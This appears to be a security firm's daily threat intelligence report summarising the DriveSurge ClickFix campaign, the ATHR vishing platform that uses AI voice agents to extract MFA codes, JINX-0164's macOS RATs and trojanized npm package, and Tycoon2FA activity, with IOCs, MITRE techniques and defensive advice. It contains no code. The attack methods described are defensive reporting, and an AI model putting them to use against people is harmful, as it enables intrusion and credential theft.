// DEEPFALCON SECURITY SERVICE — DAILY THREAT INTELLIGENCE REPORT | JUNE 2, 2026

First published: May 30, 2026 — SilentPush (primary research); June 1, 2026 — CyberSecurityNews, BleepingComputer (06:14 PM)
Exclusion reason: All articles first published on May 30 and June 1, 2026 — prior to coverage date of June 2, 2026. No new materially different article published June 2.
Attack Category: Phishing (ClickFix social engineering) + LotL/Native Tool Abuse (PowerShell command execution via ClickFix)
Threat Actor: DriveSurge — newly identified Initial Access Broker (IAB) operating a Pay-Per-Install (PPI) model. Active since at least September 2025. Unattributed cluster.
Campaign Name: DriveSurge ClickFix/FakeUpdates Drive-By Campaign
Target Platforms: Windows (primary) and macOS (confirmed via cross-platform payload); all major browsers — Chrome, Firefox, Edge, Safari, Opera, Brave, Yandex, Vivaldi, Samsung Internet, UC Browser
Target Sectors: Broad — any visitor to thousands of compromised high-reputation websites across all verticals
Technical Summary: DriveSurge injects malicious scripts into thousands of legitimate, high-reputation websites without the knowledge of site owners. When visitors land on a compromised site, hidden code routes them through an open-source Traffic Distribution System (zTDS) that profiles each visitor — bot or human, OS, browser — and serves either a ClickFix or FakeUpdates lure. In the FakeUpdates path, visitors see a convincing browser update prompt and download a ZIP containing DLLs and a malicious "Browser Update.exe". In the ClickFix path, a fake error message instructs the victim to copy and paste a PowerShell command into their terminal, silently installing malware. Bots and researchers receive the legitimate webpage. A failover mechanism cycles through multiple backup servers to ensure payload delivery even if one domain goes offline. A separate Advertisement Distribution System (ADS) collects device metadata and behavioral signals to confirm human presence before delivery. Cross-platform capability confirmed: macOS payload observed using a multi-stage shell command that downloads, executes, and self-deletes.
MITRE ATT&CK TTPs: T1566.001 (Spearphishing Link), T1204.002 (User Execution: Malicious File), T1059.001 (Command and Scripting Interpreter: PowerShell), T1036.005 (Masquerading: Match Legitimate Name or Location), T1027 (Obfuscated Files or Information — Base64/string manipulation), T1568.002 (Dynamic Resolution: Domain Generation Algorithms — via zTDS)
Defensive Actions:
1. Block DriveSurge IOC domains listed below in your web proxy and DNS filtering immediately.
2. Block IP 91.92.240[.]127 at perimeter firewall — confirmed ClickFix C2 delivery address.
3. Warn staff: never paste commands into Run, PowerShell, or Terminal prompted by a website.
4. Only install browser updates from the browser's official update mechanism — never from a webpage.
5. Audit web-facing CMS platforms (WordPress, etc.) for unauthorized script injections in page templates.
6. Monitor for anomalous outbound connections to .icu, .bond, .shop, .live, .cfd TLDs from workstations. References: SilentPush Primary Research — May 30, 2026 · CyberSecurityNews — June 1, 2026 · BleepingComputer — June 1, 2026

First published: April 16, 2026 — BleepingComputer (Abnormal Security research)
Exclusion reason: Article first published April 16, 2026 — 47 days prior to coverage date. No new coverage-date article with materially new technical detail.
Summary: ATHR is a commercial cybercrime platform sold on underground forums for $4,000 plus 10% commission. It automates the complete Telephone-Oriented Attack Delivery (TOAD) chain — from spoofed phishing emails to AI voice agent calls — targeting Google, Microsoft, Coinbase, Binance, Gemini, Crypto.com, Yahoo, and AOL accounts. Lure emails mimic security alerts and include phone numbers. Calling routes victims through Asterisk/WebRTC to AI voice agents guided by carefully crafted prompts simulating account recovery processes. Six-digit verification codes are extracted in real time. The platform provides a dashboard for email distribution, call management, credential harvesting, and real-time outcome monitoring. A single operator can manage the full attack chain from a browser. Researchers recorded over 600,000 daily TOAD attacks at peak volume in 2025.
MITRE ATT&CK TTPs: T1566.002 (Spearphishing Link — email lure), T1598.004 (Phishing for Information: Vishing), T1621 (Multi-Factor Authentication Request Generation — verification code theft), T1598.001 (Phishing for Information via voice)
Defensive Actions:
1. Train staff to never provide MFA codes or verification codes to inbound callers regardless of urgency.
2. Flag emails containing phone numbers as high-risk — apply enhanced filtering and user warnings.
3. Verify caller identity through an official callback to the organization's known published number.
Reference: BleepingComputer — April 16, 2026

First published: May 29, 2026 — CyberSecurityNews; May 28–29, 2026 — Wiz.io (primary), The Hacker News
Exclusion reason: Article first published May 28–29, 2026 — prior to coverage date. No new June 2 article.
Summary: JINX-0164 is a financially motivated threat actor active since at least mid-2025, targeting cryptocurrency organizations using convincing LinkedIn profiles posing as recruiters or business contacts. Victims receive fake meeting invitations linking to lookalike teleconference domains (Microsoft Teams, Slack, Aircall impersonators) that trigger macOS RAT download. The custom Python RAT AUDIOFIX performs broad automated data theft; a Go-based backdoor MINIRAT provides persistent remote access. In April 2026, JINX-0164 escalated to supply chain attacks by trojanizing version 4.9.1 of npm package @velora-dex/sdk. Shares techniques with North Korean groups (UNC1069/Sleet) but no confirmed attribution or infrastructure overlap.
Confirmed IOCs: apple.driver-store[.]com (fake driver store RAT delivery); apple.driver-update[.]io (AUDIOFIX dropper domain); @velora-dex/sdk v4.9.1 (trojanized npm package — do not install)
Reference: Wiz.io Primary Research · CyberSecurityNews — May 29, 2026

Note: TechRadar and several aggregators published their DriveSurge coverage approximately 4 hours before our research window on June 2, 2026. However, BleepingComputer's primary article was timestamped June 1, 2026 at 06:14 PM ET, and TechRadar's article ("4 hours ago" at time of research on June 2) is syndicated coverage of the same SilentPush report — it contains no materially new technical detail, IOCs, or threat actor attribution beyond the primary June 1 articles. Per Section 1A Rule 2 exception criteria, it does not qualify for a full finding card as the originating research (SilentPush May 30, BleepingComputer June 1) is prior-date and no new material is added.
No new IOCs added by TechRadar coverage.

First published: April 30, 2026 — Microsoft Security Blog (Q1 2026 Email Threat Landscape); March 4, 2026 — Microsoft (Inside Tycoon2FA analysis)
Exclusion reason: Articles first published April 30 and March 4, 2026. No new June 2 article.
Current status: Following March 2026 coordinated disruption by Microsoft DCU and law enforcement, Tycoon2FA operators have migrated hosting and domain registration patterns. January 2026 volume was 54% below December 2025. February 2026 saw a 44% surge before the March disruption drove a 15% volume decrease. Platform now operating with distributed infrastructure to restore anti-analysis protections. 8.3 billion email phishing threats detected in Q1 2026. QR code phishing doubled over Q1 2026, emerging as fastest-growing attack vector.
Defender note: Do not assume Tycoon2FA is neutralised. Monitor for resumed campaigns from new hosting infrastructure across your email security tooling.
Reference: Microsoft Security Blog — April 30, 2026 · Microsoft Security Blog — March 4, 2026